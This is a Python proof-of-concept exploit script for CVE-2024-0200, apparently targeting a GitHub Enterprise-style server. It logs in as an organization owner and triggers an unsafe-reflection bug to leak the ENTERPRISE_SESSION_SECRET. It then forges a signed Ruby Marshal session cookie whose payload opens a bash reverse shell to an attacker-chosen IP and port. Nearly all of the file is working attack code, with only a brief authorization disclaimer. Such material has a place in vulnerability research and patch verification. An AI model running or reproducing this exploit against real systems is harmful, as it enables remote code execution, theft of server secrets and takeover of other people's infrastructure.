"""Proof-of-concept script for CVE-2024-0200.

Only run this against systems you own or are explicitly authorized to test.
"""

import re
import hmac
import json
import base64
import random
import string
import hashlib
import argparse
import requests
import urllib.parse
from bs4 import BeautifulSoup

import urllib3

# Every request below is sent with verify=False; silence the resulting warnings.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


class Exploit():
    """Drives the individual steps of the proof of concept against one target.

    Two HTTP sessions are kept: ``api_session`` uses basic auth against the
    ``/api/v3`` endpoints, ``web_session`` holds the cookies obtained from the
    web login form.
    """

    def __init__(self, target, username, password, connect_back_ip, connect_back_port):
        """Store the target details and create the two HTTP sessions.

        Args:
            target: Base URL of the target; trailing slashes are stripped.
            username: Account name used for both the API and the web login.
            password: Password for ``username``.
            connect_back_ip: IP address embedded in the command built by ``rce``.
            connect_back_port: Port embedded in the command built by ``rce``.
        """
        self.base_url = target.rstrip('/')
        self.base_api_url = f'{self.base_url}/api/v3'
        self.username = username
        self.password = password
        self.connect_back_ip = connect_back_ip
        self.connect_back_port = connect_back_port

        self.web_session = requests.Session()
        self.api_session = requests.Session()
        self.api_session.auth = (username, password)

        # Filled in by check_organization_owner() and leak_session_secret().
        self.org_name = ''
        self.secret = ''

    def check_organization_owner(self):
        """Return True if the user has the 'admin' role in any of their organizations.

        On success the first matching organization login is stored in
        ``self.org_name``. Returns False when the organization list cannot be
        fetched (non-200 response) or no organization matches.
        """
        print("Checking if user is an organization owner...")
        url = f'{self.base_api_url}/user/orgs'
        response = self.api_session.get(url, verify=False)

        # Check the status first: an error response is not guaranteed to carry
        # a JSON body, and decoding it would raise instead of returning False.
        if response.status_code != 200:
            return False

        for org in response.json():
            if self.get_user_role(org['login']) == 'admin':
                self.org_name = org['login']
                return True
        return False

    def get_user_role(self, org_name):
        """Return the user's membership role in ``org_name``, or None on a non-200 response."""
        url = f'{self.base_api_url}/orgs/{org_name}/memberships/{self.username}'
        response = self.api_session.get(url, verify=False)
        if response.status_code == 200:
            membership = response.json()
            return membership['role']
        return None

    def generate_random_string(self, length):
        """Return a random string of ``length`` ASCII letters and digits."""
        alphanumeric_chars = string.ascii_letters + string.digits
        return ''.join(random.choice(alphanumeric_chars) for _ in range(length))

    def create_repository(self, repo_name):
        """Create repository ``repo_name`` in ``self.org_name``.

        Raises:
            Exception: If the API does not answer with status 201.
        """
        url = f'{self.base_api_url}/orgs/{self.org_name}/repos'
        data = {
            'name': repo_name
        }
        response = self.api_session.post(url, json=data, verify=False)
        if response.status_code == 201:
            print(f'Repository "{repo_name}" created successfully in organization "{self.org_name}"!')
        else:
            raise Exception(f'Failed to create repository "{repo_name}" in organization "{self.org_name}"')

    def make_sure_repo_exists(self):
        """Ensure the organization has at least one repository, creating one if it has none.

        Raises:
            Exception: If the repository list cannot be fetched, or if creating
                the repository fails.
        """
        print("Checking if at least one repository exists in the organization...")
        url = f"{self.base_api_url}/orgs/{self.org_name}/repos"
        response = self.api_session.get(url, verify=False)
        if response.status_code != 200:
            raise Exception("Failed to fetch repositories.")

        repositories = response.json()
        if not repositories:
            print("No repositories found. Creating a new one...")
            self.create_repository(self.generate_random_string(10))
        else:
            print("Repositories exist in the organization.")

    def get_csrf_token(self):
        """Fetch the login page and return the value of its ``authenticity_token`` input.

        Raises:
            Exception: If the login page contains no such input.
        """
        url = f"{self.base_url}/login"
        response = self.web_session.get(url, verify=False)
        soup = BeautifulSoup(response.text, 'html.parser')
        token_field = soup.find('input', {'name': 'authenticity_token'})
        # find() returns None when nothing matches; fail with a clear message
        # instead of an AttributeError on None.
        if token_field is None:
            raise Exception("Could not find authenticity_token on the login page.")
        return token_field.get('value')

    def login(self, csrf_token):
        """POST the credentials to ``/session``; return True if the response contains 'Sign out'."""
        url = f"{self.base_url}/session"
        data = {
            'login': self.username,
            'password': self.password,
            'commit': 'Sign in',
            'authenticity_token': csrf_token,
        }
        response = self.web_session.post(url, data=data, verify=False)
        return 'Sign out' in response.text

    def do_login(self):
        """Log in to the web application and return whether the login succeeded."""
        print("Trying to login in the web app...")

        # Step 1: Get CSRF Token
        csrf_token = self.get_csrf_token()
        print("CSRF Token:", csrf_token)

        # Step 2: Login
        login_response = self.login(csrf_token)
        return login_response

    def find_token_value(self, content):
        """Return the value from ``"ENTERPRISE_SESSION_SECRET"=>"xxx"`` in ``content``, or None."""
        pattern = r'"ENTERPRISE_SESSION_SECRET"=>"([^"]+)"'
        match = re.search(pattern, content)
        if match:
            return match.group(1)
        return None

    def leak_session_secret(self):
        """Log in, request the repository_items page and store the secret in ``self.secret``.

        Raises:
            Exception: If the login fails, the expected ``repository_ids[]``
                input is missing from the response, or no secret is found in it.
        """
        if not self.do_login():
            # The original `raise("...")` raised a TypeError, because a plain
            # string is not an exception; raise a real Exception like the
            # other methods of this class do.
            raise Exception("Login error, Aborting")

        print("Login OK")
        print("Triggering Unsafe Reflection")
        url = f"{self.base_url}/organizations/{self.org_name}/settings/actions/repository_items"
        response = self.web_session.get(
            url,
            params={"page": 1, "rid_key": "restore_objects"},
            verify=False,
        )

        soup = BeautifulSoup(response.text, 'html.parser')
        ids_field = soup.find('input', {'name': 'repository_ids[]'})
        if ids_field is None:
            raise Exception("Could not find the repository_ids[] input in the response. Aborting")

        # The attribute may be absent; search an empty string in that case.
        self.secret = self.find_token_value(ids_field.get('value') or '')
        if not self.secret:
            # Stop here with a clear message rather than failing later when
            # the secret is converted to bytes.
            raise Exception("ENTERPRISE_SESSION_SECRET not found in the response. Aborting")
        print(f"Found ENTERPRISE_SESSION_SECRET: {self.secret}")

    def rce(self):
        """Build the signed cookie from ``self.secret`` and send it to the target.

        The command string replaces the template's 300-character run of 'A'
        and is padded back to the same length. The result is base64-encoded,
        signed with HMAC-SHA1 keyed by ``self.secret``, URL-quoted and sent as
        the ``_gh_render`` cookie in a GET to ``self.base_url``.
        """
        code = f"`bash -c 'bash -i >& /dev/tcp/{self.connect_back_ip}/{self.connect_back_port} 0>&1 &'`"

        print("Sending RCE payload...")
        marshal_template = (
            "\x04\bo:@ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy\t:\x0E@instance"
            "o:\x1DAqueduct::Worker::Worker\a:\v@childI\"\x026\x0199999999; AAAAAAAAAAAAAAAAAAAAA"
            "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
            "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
            "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
            "AAAAAAAAAAAAAAAAAAAAAAAAAAA\x06:\x06ET:\f@loggero:\vLogger\x00:\f@method:\x0Fkill_ch"
            "ild:\t@varI\"\x10@kill_child\x06;\tT:\x10@deprecatoro:\x1FActiveSupport::Deprecation"
            "\x06:\x0E@silencedT"
        )

        # NOTE(review): '\"' is the same one-character string as '"', so this
        # call leaves `code` unchanged. Kept as in the original.
        code = code.replace('"','\"')
        marshal_code = marshal_template.replace("A" * 300, code + ";" + "A" * (300 - len(code) - 1))
        marshal_encoded = base64.b64encode(bytes(marshal_code, 'UTF-8')).rstrip()
        digest = hmac.new(bytes(self.secret, 'UTF-8'), marshal_encoded, hashlib.sha1).hexdigest()
        marshal_encoded = urllib.parse.quote(marshal_encoded)
        session_cookie = "%s--%s" % (marshal_encoded, digest)
        print(session_cookie)

        cookies = {'_gh_render': session_cookie}
        requests.get(self.base_url, cookies=cookies, verify=False)
        print("Done")

    def run(self):
        """Run every step in order, stopping early if the user is not an organization owner."""
        if not self.check_organization_owner():
            print(f'You are not an organization owner. Aborting since this is an requirement for the exploit.')
            return
        print(f"User is an owner of organization {self.org_name}")
        self.make_sure_repo_exists()
        self.leak_session_secret()
        self.rce()


def main():
    """Parse the command-line arguments and run the proof of concept."""
    parser = argparse.ArgumentParser(description='CVE-2024-0200 exploit')
    parser.add_argument('target', type=str, help='Target base URL')
    parser.add_argument('username', type=str, help='Username for login')
    parser.add_argument('password', type=str, help='Password for login')
    parser.add_argument('connect_back_ip', type=str, help='Connect back IP')
    parser.add_argument('connect_back_port', type=str, help='Connect back Port')
    args = parser.parse_args()

    xpl = Exploit(args.target, args.username, args.password, args.connect_back_ip, args.connect_back_port)
    xpl.run()


if __name__ == '__main__':
    main()